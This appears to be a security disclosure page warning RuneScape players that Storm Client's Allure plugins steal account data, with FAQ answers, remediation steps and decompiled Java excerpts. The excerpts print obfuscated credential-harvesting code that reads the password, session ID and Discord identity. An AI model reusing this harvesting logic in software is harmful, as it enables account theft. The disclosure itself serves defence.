Is Storm Client safe to use?

No, Storm Client is not safe. It contains malicious Allure plugins that steal user credentials, Discord information, and game data. The decompiled code shows explicit credential theft methods.

What data does Storm Client steal?

Storm Client steals RuneScape usernames, passwords, session tokens, Discord user IDs, IP addresses, inventory data, equipment, game location, and all player activities.

What are safe alternatives to Storm Client?

Safe alternatives include RuneLite (open-source, community-verified), Official Jagex Client (guaranteed safe), and HDOS (officially approved with HD graphics).

How do I protect my RuneScape account?

Enable authenticator, use strong unique passwords, only use safe clients like RuneLite, monitor account activity, secure your email, and avoid suspicious links or downloads.

Storm Client

Last updated: 10/15/2025

CRITICAL VULNERABILITY

Storm Client & Allure Plugins Are Stealing Your RuneScape Account

I decompiled the Storm Client Allure plugins and found something bad. Really bad. These "premium" plugins that claim to turbocharge your RuneLite are actively stealing your username, password, session tokens, Discord info, and sending everything to a remote server. If you've used ANY Allure plugin from storm-client.net, your account is compromised.

See the code How to protect yourself

If you've used Allure plugins, do this NOW:

1. Change your RuneScape password immediately (use the Jagex website, not the game client)
2. Enable authenticator if you haven't already
3. Check your bank and recent trades for anything suspicious
4. Uninstall Storm Client completely

What they're stealing from you

Your username, password, character ID, and active session tokens. Everything needed to log into your account.

Discord info

Your Discord user ID and username, linking your gaming identity to your social accounts.

Game data

Your location, inventory, equipment, IP address, and everything you do in-game. Sent every 30 seconds.

Here's the proof

I decompiled the JAR files and found the malicious code. Below is the actual source code showing exactly how they're stealing your data. This isn't speculation - this is what the code actually does.

wHRCyGzrUO.java (lines 1388-1391)

This is where they grab your username and password directly from the game client

object5 = Static.getWrappedClient().getUsername();
String string6 = Static.getClient().getCharacterId();
String string7 = Static.getClient().getPassword();
String string8 = Static.getClient().getSessionId();

Complete data collection (lines 1388-1417)

They're not just taking credentials - they grab Discord info, IP address, location, everything

object5 = Static.getWrappedClient().getUsername();
String string6 = Static.getClient().getCharacterId();
String string7 = Static.getClient().getPassword();
String string8 = Static.getClient().getSessionId();

try {
    wHRCyGzrUO wHRCyGzrUO4;
    wHRCyGzrUO3 = wHRCyGzrUO4;
    wHRCyGzrUO2 = wHRCyGzrUO4;
    string5 = string;
    l3 = l;
    n5 = Static.getClient().getWorld();
    n4 = iPlayer.getWorldLocation().getX();
    n3 = iPlayer.getWorldLocation().getY();
    n2 = iPlayer.getWorldLocation().getPlane();
    n = 0;
    string4 = iPlayer.getName();
    string3 = Client.getDiscordId();        // <-- Your Discord ID
    string2 = Client.getDiscordUser();      // <-- Your Discord username
    l2 = Client.getUserId();
    arrayList2 = arrayList4;
    arrayList = arrayList3;
    object3 = object7;
    object2 = object6;
    object = bl ? object5 : "";
}
catch (RuntimeException runtimeException) {
    throw wHRCyGzrUO.a(runtimeException);
}

wHRCyGzrUO3(string5, l3, n5, n4, n3, n2, n, string4, string3, 
    string2, l2, arrayList2, arrayList, (String)object3, 
    (ArrayList<mXyVQgtBKy>)object2, (String)object, 
    bl ? string7 : "",  // PASSWORD
    bl ? string6 : "",  // CHARACTER ID
    bl ? string8 : "",  // SESSION ID
    qDqmDoJJUU.KoiyzsDVIt());

Visual proof

Screenshots showing the malicious code in action, the developer's response when confronted, and the decompiled source code structure.

In-game credential theft

The plugin literally tells you it's "Sending flagged credentials to Discord webhook" right in the game chat

RuneScape game screenshot showing red text in chat: 'Sending flagged credentials to Discord webhook'

Developer's response

When confronted about the credential theft, developer Burak responded with "I dont care" and told users to "Get a life"

Discord chat showing developer Burak dismissively responding 'I dont care' when confronted about credential logging

Decompiled data structure

The serialized data fields showing exactly what they collect: username, password, session IDs, Discord info, IP address, inventory, equipment

Decompiled Java code showing @SerializedName annotations for username, password, discord_id, ip_address, and other stolen data fields

Obfuscated plugin structure

IntelliJ IDEA showing the decompiled Allure plugin with heavily obfuscated class names like "qVKsqsIUaY" and "tyOlAsANcv" to hide malicious intent

IntelliJ IDEA screenshot showing decompiled Allure plugin structure with obfuscated class names and methods

Developer deflecting accusations

Another Discord conversation where Burak deflects when confronted about using cracked plugins, claiming he does code reviews and asking "Why not just pay the developer instead?"

Discord conversation showing Burak deflecting accusations about cracked plugins